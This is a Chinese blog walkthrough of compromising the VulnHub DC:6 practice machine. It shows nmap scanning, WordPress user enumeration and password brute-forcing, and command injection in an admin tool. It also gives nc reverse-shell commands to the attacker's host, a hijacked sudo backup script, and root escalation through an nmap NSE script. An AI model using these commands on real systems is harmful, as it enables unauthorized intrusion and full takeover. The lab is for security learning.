程序笔记   发布时间:2022-07-15  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了vulnhub-DC:6靶机渗透记录大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。

准备工作

在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub

导入到vmware,设置成NAT模式

vulnhub-DC:6靶机渗透记录

打开kali准备进行渗透(ip:192.168.200.6)

 

信息收集

 利用nmap进行ip端口探测

nmap -sS 192.168.200.6/24 

vulnhub-DC:6靶机渗透记录

 探测到ip为192.168.200.17的靶机,开放了80端口和22端口

再用nmap对所有端口进行探测,确保没有别的遗漏信息  

nmap -sV -p- 192.168.200.17

vulnhub-DC:6靶机渗透记录

 

先看看80端口,一直打不开,重定向到了wordy,像DC:2的方法一样操作,修改host文件

vulnhub-DC:6靶机渗透记录

vi /etc/hosts

vulnhub-DC:6靶机渗透记录

 和dc:2的界面一模一样框架也是 WordPress

vulnhub-DC:6靶机渗透记录

 

 dirsearch扫描也扫到了/wp-login.php后台登陆页面

vulnhub-DC:6靶机渗透记录

 

vulnhub-DC:6靶机渗透记录

 接下来和dc:2的操作基本一致

 

wpscan扫描

使用kali自带的工具wpscan(wordpress框架专门的漏洞扫描工具)列举出所有用户  

wpscan --url http://wordy/ -e u 

vulnhub-DC:6靶机渗透记录

 

 爆出五个用户 admin、jens、graham、mark、sarah,保存下来待会进行爆破

但是用了很多字典都爆破不出来,不知道怎么办的时候才发现在下载地址处的最下面给了线索DC: 6 ~ VulnHub

vulnhub-DC:6靶机渗透记录

 

先cd到/usr/share/wordlists/这个目录,因为rockyou这个文件没有解压不能直接打开

gunzip rockyou.txt.gz  

vulnhub-DC:6靶机渗透记录

 再返回桌面执行作者给的命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

vulnhub-DC:6靶机渗透记录

直接使用wordy进行爆破

wpscan --url http://wordy/ -U user -P passwords.txt

vulnhub-DC:6靶机渗透记录

 爆到用户名mark 密码Helpdesk01

 

nc反弹sHell

 登陆到刚刚的后台页面,在这里找到了命令执行的地方,试了一下127.0.0.1|ls 发现有漏洞可以执行任意命令,那就可以反弹sHell到kali上

vulnhub-DC:6靶机渗透记录

 

vulnhub-DC:6靶机渗透记录

使用Nc反弹sHell,但是那个框有字数限制,用bp抓一下再放出去就解决了

nc -e /bin/bash 192.168.200.6 9999 

vulnhub-DC:6靶机渗透记录

再使用python 通过pty.spawn()获得交互式sHell

python -c'import pty;pty.spawn("/bin/bash")'

vulnhub-DC:6靶机渗透记录

 

 

root没有权限进不去,但是在home里发现了四个用户,在mark用户发现了一个txt文件,里面有graham的密码 GSo7isUM1D4

vulnhub-DC:6靶机渗透记录

vulnhub-DC:6靶机渗透记录

 

 使用su切换成graham,看看graham的权限

vulnhub-DC:6靶机渗透记录

发现jens下的BACkups.sh可以不用密码执行,可以用来获取jens的权限

这里有两种方法第一种是写入/bin/bash/,然后以jens的用户来执行文件直接获取权限

这里我记录第二种方法,写入nc命令,然后在另一端监听nc -lvf 9999,最后在以jens用户执行sh文件,再使用python 通过pty.spawn()获得交互式sHell,两种方法思路都差不多

 

echo 'nc 192.168.200.6 9999 -e /bin/bash' > BACkups.sh 

sudo -u jens /home/jens/BACkups.sh

python -c'import pty;pty.spawn("/bin/bash")'

 

vulnhub-DC:6靶机渗透记录

 

在看看jens的权限sudo -l

vulnhub-DC:6靶机渗透记录

发现root权限namp无需密码,利用这个文件提权

 

权限提升

namp有执行脚本的功能,那就可以写一个执行bash的脚本文件,通过namp执行来提权

echo 'os.execute("/bin/sh")' > getroot.nse   //nes脚本后缀sudo nmap --script=/home/jens/getroot.nse   //namp执行

vulnhub-DC:6靶机渗透记录

 

vulnhub-DC:6靶机渗透记录

DONE 

 

文章

靶机DC-6_sm1rk的博客-CSDN博客

 

大佬总结

以上是大佬教程为你收集整理的vulnhub-DC:6靶机渗透记录全部内容,希望文章能够帮你解决vulnhub-DC:6靶机渗透记录所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。